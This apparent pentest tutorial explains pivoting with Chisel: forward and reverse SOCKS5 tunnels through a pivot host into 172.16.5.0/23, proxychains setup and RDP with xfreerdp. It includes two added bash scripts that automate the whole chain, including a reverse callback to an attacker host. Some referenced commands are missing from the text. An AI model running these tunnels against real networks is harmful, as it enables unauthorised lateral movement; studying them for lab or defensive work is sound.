SOCKS5 Tunneling with Chisel
Chisel tunnels data over HTTP and secures it with SSH: HTTP is the transport, and an SSH layer inside it provides encryption and authentication of the tunnel. Pre-built binaries are published for Linux and Windows; building from source requires Go (Golang). Chisel creates TCP/UDP tunnels, including a SOCKS5 proxy, between two subnets, and the same single binary runs as either the client or the server.
Note that the client and server should run the same version of Chisel.
When to use?
Chisel is an alternative when establishing an SSH session with the pivot host is not possible (no SSH service, or no SSH credentials): it only needs a single TCP port reachable between the attacker machine and the pivot host, in either direction.
Downsides
Tools that are not SOCKS-aware have to be run through proxychains (or another proxifier), and proxychains only carries TCP: ICMP host discovery and UDP scans do not traverse the tunnel, so nmap has to be run as a connect scan with -sT -Pn.
Running the server on the pivot host
We transferred the Chisel binary to the pivot host with scp. The pivot host has two network interfaces, one of them attached to the 172.16.5.0/23 network. The following command was used to start the Chisel server: it listens on port 1234 for client connections and, with SOCKS5 enabled, forwards client traffic to any network the pivot host is attached to.
On our attacker machine, we ran the Chisel client, which connected to the Chisel server on port 1234.
As can be seen below, a connection has been established between the Chisel server and the client. The Chisel client listens on 127.0.0.1:1080 by default for incoming SOCKS5 connections.
Configuring proxychains
Now we have to configure the /etc/proxychains.conf file (/etc/proxychains4.conf on systems with proxychains-ng) so that the traffic of any tool launched through proxychains is sent to the SOCKS5 proxy on 127.0.0.1:1080.
With the tunnel and the SOCKS proxy configured, we can use proxychains with xfreerdp to RDP into a Windows system located in the 172.16.5.0/23 subnet.
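The whole forward-pivot procedure as one script, added here as an example (it is not the page's own code): it starts the server on the pivot, the client on the attacker box, rewrites the proxychains configuration to a single SOCKS5 hop, checks the target's RDP port through the tunnel and launches xfreerdp. PIVOT_HOST, RDP_TARGET, RDP_USER and RDP_PASS are placeholder environment variables; their values, the 3389 port check and the proxychains path are assumptions, not values from the page. DRY_RUN=1 prints each command instead of executing it, which is how the commands can be reviewed before use.

```shell
#!/usr/bin/env bash
# chisel_pivot.sh - forward SOCKS5 pivot with Chisel (added example, not the page's own code)
# Assumed placeholders (set in the environment, not taken from the page):
#   PIVOT_HOST  address of the pivot host (where the Chisel server runs)
#   RDP_TARGET  Windows host inside 172.16.5.0/23
#   RDP_USER, RDP_PASS  credentials for the RDP session
set -eu

CHISEL_PORT="${CHISEL_PORT:-1234}"      # server listener, as in the walkthrough
SOCKS_PORT="${SOCKS_PORT:-1080}"        # Chisel client's default SOCKS5 port
PROXYCHAINS_CONF="${PROXYCHAINS_CONF:-/etc/proxychains.conf}"
DRY_RUN="${DRY_RUN:-0}"                 # 1 = print commands instead of running them

# Execute a command, or print it when DRY_RUN=1.
run() {
    if [ "$DRY_RUN" = 1 ]; then printf '%s\n' "$*"; else "$@"; fi
}

# On the pivot host: listen on $CHISEL_PORT and enable the built-in SOCKS5 proxy.
# Without --socks5 the server rejects the client's "socks" remote.
start_server() {
    run chisel server -p "$CHISEL_PORT" --socks5
}

# On the attacker box: connect to the pivot and expose SOCKS5 on 127.0.0.1:$SOCKS_PORT.
# "socks" is Chisel's alias for the server-side proxy; "1080:socks" pins the local port.
start_client() {
    run chisel client "${PIVOT_HOST:?set PIVOT_HOST to the pivot address}:$CHISEL_PORT" \
        "$SOCKS_PORT:socks"
}

# Rewrite proxychains.conf so the chain has exactly one hop: our SOCKS5 listener.
# Existing socks4/socks5/http entries are commented out rather than deleted.
configure_proxychains() {
    local conf="$1"
    [ -f "$conf" ] || printf '[ProxyList]\n' > "$conf"
    sed -i -E 's/^[[:space:]]*(socks4|socks5|http)[[:space:]]+/# &/' "$conf"
    grep -q '^\[ProxyList\]' "$conf" || printf '[ProxyList]\n' >> "$conf"
    printf 'socks5 127.0.0.1 %s\n' "$SOCKS_PORT" >> "$conf"
}

# Check the RDP port through the tunnel before launching a client. proxychains
# only carries TCP, so nmap needs a connect scan (-sT) and no ICMP discovery (-Pn).
check_target() {
    run proxychains nmap -sT -Pn -p 3389 "${RDP_TARGET:?set RDP_TARGET to the Windows host}"
}

# RDP into the target; xfreerdp is not SOCKS-aware, so proxychains hooks its connect().
rdp_via_tunnel() {
    run proxychains xfreerdp "/v:${RDP_TARGET:?set RDP_TARGET}" \
        "/u:${RDP_USER:?set RDP_USER}" "/p:${RDP_PASS:?set RDP_PASS}"
}

usage() { echo "usage: $0 server|client|proxy|check|rdp" >&2; return 2; }

main() {
    case "${1:-}" in
        server) start_server ;;
        client) start_client ;;
        proxy)  configure_proxychains "$PROXYCHAINS_CONF" ;;
        check)  check_target ;;
        rdp)    rdp_via_tunnel ;;
        *)      usage ;;
    esac
}

# Only dispatch when invoked with an action, so the functions can also be sourced.
if [ "$#" -gt 0 ]; then main "$@"; fi
```

Run `server` on the pivot, then `client`, `proxy`, `check` and `rdp` in that order on the attacker machine; the `check` step is the cheapest way to confirm the pivot actually reaches the target before an interactive client is started.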
Reverse Pivot
Chisel can also be used to set up a reverse tunnel from the pivot host to our attacker machine. Unlike the previous scenario, the server runs on our attacker box and the client on the pivot host connects back to it. Reverse tunneling is handy when inbound connections to the pivot host are blocked by a firewall but outbound connections from it are allowed.
Setting up the server
The following command starts the Chisel server on our attacker host with reverse tunnels enabled. Port 1234 listens for the Chisel client connection. As in the previous scenario, the SOCKS proxy port used by default is 1080, but this time the listener is opened on the attacker host.
Connect the client
On the pivot host, we used the command below to connect the Chisel client to our Chisel server on port 1234 with a reverse SOCKS remote.
As in the previous scenario, proxychains.conf points at the listener on 127.0.0.1:1080 (now on the attacker host, where the Chisel server runs). We can then use proxychains and xfreerdp to establish an RDP session to the Windows target located on the 172.16.5.0/23 network.
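The reverse variant as a companion script, added as an example (not the page's own code). The server now runs on the attacker host with --reverse, and the pivot's client pushes a reverse SOCKS remote (R:socks) back to it, so the SOCKS5 listener appears on the attacker host and the proxychains entry from the forward scenario applies unchanged. It goes one step beyond the page with a reverse port forward (R:127.0.0.1:<port>:<target>:3389), which is the same Chisel remote syntax: it exposes the target's RDP port on the attacker's loopback so xfreerdp can connect without proxychains. ATTACKER_HOST, RDP_TARGET, RDP_USER and RDP_PASS are placeholder environment variables, the local forward port 13389 is an arbitrary choice, and the listener check assumes ss from iproute2.

```shell
#!/usr/bin/env bash
# chisel_reverse.sh - reverse pivot with Chisel (added example, not the page's own code)
# Assumed placeholders (environment variables, not values from the page):
#   ATTACKER_HOST  address the pivot host uses to reach our machine
#   RDP_TARGET     Windows host inside 172.16.5.0/23
#   RDP_USER, RDP_PASS  credentials for the RDP session
set -eu

CHISEL_PORT="${CHISEL_PORT:-1234}"          # Chisel server port on the attacker host
SOCKS_PORT="${SOCKS_PORT:-1080}"            # default port of a reverse "R:socks" remote
LOCAL_RDP_PORT="${LOCAL_RDP_PORT:-13389}"   # assumed loopback port for the port forward
DRY_RUN="${DRY_RUN:-0}"                     # 1 = print commands instead of running them

run() {
    if [ "$DRY_RUN" = 1 ]; then printf '%s\n' "$*"; else "$@"; fi
}

# On the attacker host: --reverse is required for the server to accept R: remotes,
# i.e. to open listeners on our side whose traffic is proxied through the client.
start_reverse_server() {
    run chisel server --reverse -p "$CHISEL_PORT"
}

# On the pivot host: the only connection is outbound to us on $CHISEL_PORT, which is
# what gets past a firewall that blocks inbound traffic to the pivot.
# R:socks makes the attacker host listen on 1080; SOCKS traffic egresses from the pivot.
connect_reverse_socks() {
    run chisel client "${ATTACKER_HOST:?set ATTACKER_HOST}:$CHISEL_PORT" "R:socks"
}

# Alternative remote for a single service: the attacker host listens on
# 127.0.0.1:$LOCAL_RDP_PORT and the pivot forwards to the target's 3389. Binding to
# loopback keeps the forwarded RDP port off the attacker host's other interfaces.
connect_reverse_rdp_forward() {
    run chisel client "${ATTACKER_HOST:?set ATTACKER_HOST}:$CHISEL_PORT" \
        "R:127.0.0.1:$LOCAL_RDP_PORT:${RDP_TARGET:?set RDP_TARGET}:3389"
}

# On the attacker host: wait until the reverse listener exists, which only happens
# once the pivot's client has connected. Polls ss; fails after $2 seconds (default 30).
wait_for_listener() {
    local port="$1" timeout="${2:-30}"
    while [ "$timeout" -gt 0 ]; do
        if ss -ltn 2>/dev/null | grep -q ":$port "; then return 0; fi
        sleep 1
        timeout=$((timeout - 1))
    done
    return 1
}

# With the port forward, no proxifier is needed: xfreerdp talks to the local listener.
rdp_via_forward() {
    run xfreerdp "/v:127.0.0.1:$LOCAL_RDP_PORT" \
        "/u:${RDP_USER:?set RDP_USER}" "/p:${RDP_PASS:?set RDP_PASS}"
}

usage() { echo "usage: $0 server|socks|forward|wait-socks|rdp" >&2; return 2; }

main() {
    case "${1:-}" in
        server)     start_reverse_server ;;
        socks)      connect_reverse_socks ;;
        forward)    connect_reverse_rdp_forward ;;
        wait-socks) wait_for_listener "$SOCKS_PORT" "${2:-30}" ;;
        rdp)        rdp_via_forward ;;
        *)          usage ;;
    esac
}

if [ "$#" -gt 0 ]; then main "$@"; fi
```

Run `server` on the attacker host first, then `socks` or `forward` on the pivot; `wait-socks` on the attacker host blocks until the R:socks listener is up, which is the moment proxychains traffic can start flowing.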